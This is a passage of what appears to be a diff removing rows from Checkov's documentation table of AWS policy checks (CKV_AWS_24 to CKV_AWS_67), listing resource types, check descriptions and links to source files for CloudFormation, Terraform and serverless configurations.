-| 205 | CKV_AWS_24 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Cloudformation | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
-| 206 | CKV_AWS_24 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) | 
-| 207 | CKV_AWS_24 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
-| 208 | CKV_AWS_24 | resource | aws_vpc_security_group_ingress_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py) |
-| 209 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroup | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
-| 210 | CKV_AWS_25 | resource | AWS::EC2::SecurityGroupIngress | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Cloudformation | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
-| 211 | CKV_AWS_25 | resource | aws_security_group | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
-| 212 | CKV_AWS_25 | resource | aws_security_group_rule | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) |
-| 213 | CKV_AWS_25 | resource | aws_vpc_security_group_ingress_rule | Ensure no security 
groups allow ingress from 0.0.0.0:0 to port 3389 | Terraform | [SecurityGroupUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress3389.py) | -| 214 | CKV_AWS_26 | resource | AWS::SNS::Topic | Ensure all data stored in the SNS topic is encrypted | Cloudformation | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SNSTopicEncryption.py) | -| 215 | CKV_AWS_26 | resource | aws_sns_topic | Ensure all data stored in the SNS topic is encrypted | Terraform | [SNSTopicEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicEncryption.py) | -| 216 | CKV_AWS_27 | resource | AWS::SQS::Queue | Ensure all data stored in the SQS queue is encrypted | Cloudformation | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SQSQueueEncryption.py) | -| 217 | CKV_AWS_27 | resource | aws_sqs_queue | Ensure all data stored in the SQS queue is encrypted | Terraform | [SQSQueueEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueueEncryption.py) | -| 218 | CKV_AWS_28 | resource | AWS::DynamoDB::Table | Ensure DynamoDB point in time recovery (backup) is enabled | Cloudformation | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbRecovery.py) | -| 219 | CKV_AWS_28 | resource | aws_dynamodb_table | Ensure DynamoDB point in time recovery (backup) is enabled | Terraform | [DynamodbRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamodbRecovery.py) | -| 220 | CKV_AWS_29 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Cloudformation | 
[ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 221 | CKV_AWS_29 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at rest | Terraform | [ElasticacheReplicationGroupEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtRest.py) | -| 222 | CKV_AWS_30 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 223 | CKV_AWS_30 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit | Terraform | [ElasticacheReplicationGroupEncryptionAtTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransit.py) | -| 224 | CKV_AWS_31 | resource | AWS::ElastiCache::ReplicationGroup | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Cloudformation | [ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | -| 225 | CKV_AWS_31 | resource | aws_elasticache_replication_group | Ensure all data stored in the ElastiCache Replication Group is securely encrypted at transit and has auth token | Terraform | 
[ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py) | -| 226 | CKV_AWS_32 | resource | AWS::ECR::Repository | Ensure ECR policy is not set to public | Cloudformation | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRPolicy.py) | -| 227 | CKV_AWS_32 | resource | aws_ecr_repository_policy | Ensure ECR policy is not set to public | Terraform | [ECRPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRPolicy.py) | -| 228 | CKV_AWS_33 | resource | AWS::KMS::Key | Ensure KMS key policy does not contain wildcard (*) principal | Cloudformation | [KMSKeyWildCardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KMSKeyWildCardPrincipal.py) | -| 229 | CKV_AWS_33 | resource | aws_kms_key | Ensure KMS key policy does not contain wildcard (*) principal | Terraform | [KMSKeyWildcardPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyWildcardPrincipal.py) | -| 230 | CKV_AWS_34 | resource | AWS::CloudFront::Distribution | Ensure CloudFront Distribution ViewerProtocolPolicy is set to HTTPS | Cloudformation | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudfrontDistributionEncryption.py) | -| 231 | CKV_AWS_34 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution ViewerProtocolPolicy is set to HTTPS | Terraform | [CloudfrontDistributionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEncryption.py) | -| 232 | CKV_AWS_35 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | 
Cloudformation | [CloudtrailEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailEncryption.py) | -| 233 | CKV_AWS_35 | resource | aws_cloudtrail | Ensure CloudTrail logs are encrypted at rest using KMS CMKs | Terraform | [CloudtrailEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEncryptionWithCMK.py) | -| 234 | CKV_AWS_36 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail log file validation is enabled | Cloudformation | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailLogValidation.py) | -| 235 | CKV_AWS_36 | resource | aws_cloudtrail | Ensure CloudTrail log file validation is enabled | Terraform | [CloudtrailLogValidation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailLogValidation.py) | -| 236 | CKV_AWS_37 | resource | aws_eks_cluster | Ensure Amazon EKS control plane logging is enabled for all log types | Terraform | [EKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSControlPlaneLogging.py) | -| 237 | CKV_AWS_38 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint not accessible to 0.0.0.0/0 | Terraform | [EKSPublicAccessCIDR.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccessCIDR.py) | -| 238 | CKV_AWS_39 | resource | aws_eks_cluster | Ensure Amazon EKS public endpoint disabled | Terraform | [EKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSPublicAccess.py) | -| 239 | CKV_AWS_40 | resource | AWS::IAM::Policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain 
excessive privileges.) | Cloudformation | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 240 | CKV_AWS_40 | resource | aws_iam_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 241 | CKV_AWS_40 | resource | aws_iam_user_policy | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) | Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 242 | CKV_AWS_40 | resource | aws_iam_user_policy_attachment | Ensure IAM policies are attached only to groups or roles (Reducing access management complexity may in-turn reduce opportunity for a principal to inadvertently receive or retain excessive privileges.) 
| Terraform | [IAMPolicyAttachedToGroupOrRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMPolicyAttachedToGroupOrRoles.py) | -| 243 | CKV_AWS_41 | provider | aws | Ensure no hard coded AWS access key and secret key exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/aws/credentials.py) | -| 244 | CKV_AWS_41 | resource | serverless_aws | Ensure no hard coded AWS access key and secret key exists in provider | serverless | [AWSCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/AWSCredentials.py) | -| 245 | CKV_AWS_42 | resource | AWS::EFS::FileSystem | Ensure EFS is securely encrypted | Cloudformation | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EFSEncryptionEnabled.py) | -| 246 | CKV_AWS_42 | resource | aws_efs_file_system | Ensure EFS is securely encrypted | Terraform | [EFSEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSEncryptionEnabled.py) | -| 247 | CKV_AWS_43 | resource | AWS::Kinesis::Stream | Ensure Kinesis Stream is securely encrypted | Cloudformation | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py) | -| 248 | CKV_AWS_43 | resource | aws_kinesis_stream | Ensure Kinesis Stream is securely encrypted | Terraform | [KinesisStreamEncryptionType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptionType.py) | -| 249 | CKV_AWS_44 | resource | AWS::Neptune::DBCluster | Ensure Neptune storage is securely encrypted | Cloudformation | 
[NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | -| 250 | CKV_AWS_44 | resource | aws_neptune_cluster | Ensure Neptune storage is securely encrypted | Terraform | [NeptuneClusterStorageEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NeptuneClusterStorageEncrypted.py) | -| 251 | CKV_AWS_45 | resource | AWS::Lambda::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 252 | CKV_AWS_45 | resource | AWS::Serverless::Function | Ensure no hard-coded secrets exist in Lambda environment | Cloudformation | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 253 | CKV_AWS_45 | resource | aws_lambda_function | Ensure no hard-coded secrets exist in lambda environment | Terraform | [LambdaEnvironmentCredentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentCredentials.py) | -| 254 | CKV_AWS_46 | resource | AWS::EC2::Instance | Ensure no hard-coded secrets exist in EC2 user data | Cloudformation | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EC2Credentials.py) | -| 255 | CKV_AWS_46 | resource | aws_instance | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 256 | CKV_AWS_46 | resource | aws_launch_configuration | Ensure no hard-coded secrets exist in EC2 user data | Terraform | 
[EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 257 | CKV_AWS_46 | resource | aws_launch_template | Ensure no hard-coded secrets exist in EC2 user data | Terraform | [EC2Credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EC2Credentials.py) | -| 258 | CKV_AWS_47 | resource | AWS::DAX::Cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Cloudformation | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DAXEncryption.py) | -| 259 | CKV_AWS_47 | resource | aws_dax_cluster | Ensure DAX is encrypted at rest (default is unencrypted) | Terraform | [DAXEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEncryption.py) | -| 260 | CKV_AWS_48 | resource | aws_mq_broker | Ensure MQ Broker logging is enabled | Terraform | [MQBrokerLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerLogging.py) | -| 261 | CKV_AWS_49 | data | aws_iam_policy_document | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/StarActionPolicyDocument.py) | -| 262 | CKV_AWS_49 | resource | serverless_aws | Ensure no IAM policies documents allow "*" as a statement's actions | serverless | [StarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/serverless/checks/function/aws/StarActionPolicyDocument.py) | -| 263 | CKV_AWS_50 | resource | aws_lambda_function | X-Ray tracing is enabled for Lambda | Terraform | [LambdaXrayEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaXrayEnabled.py) | -| 264 | CKV_AWS_51 | resource | AWS::ECR::Repository | Ensure ECR Image 
Tags are immutable | Cloudformation | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImmutableTags.py) | -| 265 | CKV_AWS_51 | resource | aws_ecr_repository | Ensure ECR Image Tags are immutable | Terraform | [ECRImmutableTags.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImmutableTags.py) | -| 266 | CKV_AWS_53 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public ACLs enabled | Cloudformation | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicACLs.py) | -| 267 | CKV_AWS_53 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public ACLS enabled | Terraform | [S3BlockPublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicACLs.py) | -| 268 | CKV_AWS_54 | resource | AWS::S3::Bucket | Ensure S3 bucket has block public policy enabled | Cloudformation | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3BlockPublicPolicy.py) | -| 269 | CKV_AWS_54 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has block public policy enabled | Terraform | [S3BlockPublicPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BlockPublicPolicy.py) | -| 270 | CKV_AWS_55 | resource | AWS::S3::Bucket | Ensure S3 bucket has ignore public ACLs enabled | Cloudformation | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3IgnorePublicACLs.py) | -| 271 | CKV_AWS_55 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has ignore public ACLs enabled | Terraform | [S3IgnorePublicACLs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3IgnorePublicACLs.py) | -| 
272 | CKV_AWS_56 | resource | AWS::S3::Bucket | Ensure S3 bucket has RestrictPublicBuckets enabled | Cloudformation | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3RestrictPublicBuckets.py) | -| 273 | CKV_AWS_56 | resource | aws_s3_bucket_public_access_block | Ensure S3 bucket has 'restrict_public_buckets' enabled | Terraform | [S3RestrictPublicBuckets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3RestrictPublicBuckets.py) | -| 274 | CKV_AWS_57 | resource | AWS::S3::Bucket | Ensure the S3 bucket does not allow WRITE permissions to everyone | Cloudformation | [S3PublicACLWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/S3PublicACLWrite.py) | -| 275 | CKV_AWS_57 | resource | aws_s3_bucket | S3 Bucket has an ACL defined which allows public WRITE access. | Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 276 | CKV_AWS_57 | resource | aws_s3_bucket_acl | S3 Bucket has an ACL defined which allows public WRITE access. 
| Terraform | [S3PublicACLWrite.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/S3PublicACLWrite.yaml) | -| 277 | CKV_AWS_58 | resource | AWS::EKS::Cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Cloudformation | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/EKSSecretsEncryption.py) | -| 278 | CKV_AWS_58 | resource | aws_eks_cluster | Ensure EKS Cluster has Secrets Encryption Enabled | Terraform | [EKSSecretsEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EKSSecretsEncryption.py) | -| 279 | CKV_AWS_59 | resource | AWS::ApiGateway::Method | Ensure there is no open access to back-end resources through API | Cloudformation | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/APIGatewayAuthorization.py) | -| 280 | CKV_AWS_59 | resource | aws_api_gateway_method | Ensure there is no open access to back-end resources through API | Terraform | [APIGatewayAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayAuthorization.py) | -| 281 | CKV_AWS_60 | resource | AWS::IAM::Role | Ensure IAM role allows only specific services or principals to assume it | Cloudformation | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | -| 282 | CKV_AWS_60 | resource | aws_iam_role | Ensure IAM role allows only specific services or principals to assume it | Terraform | [IAMRoleAllowsPublicAssume.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowsPublicAssume.py) | -| 283 | CKV_AWS_61 | resource | AWS::IAM::Role | Ensure AWS IAM policy does not allow assume role permission across all services | Cloudformation | 
[IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | -| 284 | CKV_AWS_61 | resource | aws_iam_role | Ensure AWS IAM policy does not allow assume role permission across all services | Terraform | [IAMRoleAllowAssumeFromAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMRoleAllowAssumeFromAccount.py) | -| 285 | CKV_AWS_62 | resource | AWS::IAM::Group | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 286 | CKV_AWS_62 | resource | AWS::IAM::Policy | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 287 | CKV_AWS_62 | resource | AWS::IAM::Role | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 288 | CKV_AWS_62 | resource | AWS::IAM::User | Ensure no IAM policies that allow full "*-*" administrative privileges are not created | Cloudformation | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 289 | CKV_AWS_62 | resource | aws_iam_group_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 290 | 
CKV_AWS_62 | resource | aws_iam_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 291 | CKV_AWS_62 | resource | aws_iam_role_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 292 | CKV_AWS_62 | resource | aws_iam_user_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 293 | CKV_AWS_62 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure IAM policies that allow full "*-*" administrative privileges are not created | Terraform | [IAMAdminPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMAdminPolicyDocument.py) | -| 294 | CKV_AWS_63 | resource | AWS::IAM::Group | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 295 | CKV_AWS_63 | resource | AWS::IAM::Policy | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 296 | CKV_AWS_63 | resource | AWS::IAM::Role | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | 
[IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 297 | CKV_AWS_63 | resource | AWS::IAM::User | Ensure no IAM policies documents allow "*" as a statement's actions | Cloudformation | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 298 | CKV_AWS_63 | resource | aws_iam_group_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 299 | CKV_AWS_63 | resource | aws_iam_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 300 | CKV_AWS_63 | resource | aws_iam_role_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 301 | CKV_AWS_63 | resource | aws_iam_user_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 302 | CKV_AWS_63 | resource | aws_ssoadmin_permission_set_inline_policy | Ensure no IAM policies documents allow "*" as a statement's actions | Terraform | [IAMStarActionPolicyDocument.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMStarActionPolicyDocument.py) | -| 303 | CKV_AWS_64 | resource | AWS::Redshift::Cluster | Ensure 
all data stored in the Redshift cluster is securely encrypted at rest | Cloudformation | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RedshiftClusterEncryption.py) | -| 304 | CKV_AWS_64 | resource | aws_redshift_cluster | Ensure all data stored in the Redshift cluster is securely encrypted at rest | Terraform | [RedshiftClusterEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RedshiftClusterEncryption.py) | -| 305 | CKV_AWS_65 | resource | AWS::ECS::Cluster | Ensure container insights are enabled on ECS cluster | Cloudformation | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECSClusterContainerInsights.py) | -| 306 | CKV_AWS_65 | resource | aws_ecs_cluster | Ensure container insights are enabled on ECS cluster | Terraform | [ECSClusterContainerInsights.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterContainerInsights.py) | -| 307 | CKV_AWS_66 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group specifies retention days | Cloudformation | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupRetention.py) | -| 308 | CKV_AWS_66 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group specifies retention days | Terraform | [CloudWatchLogGroupRetention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupRetention.py) | -| 309 | CKV_AWS_67 | resource | AWS::CloudTrail::Trail | Ensure CloudTrail is enabled in all Regions | Cloudformation | [CloudtrailMultiRegion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudtrailMultiRegion.py) | -| 310 | CKV_AWS_67 | resource | aws_cloudtrail | 
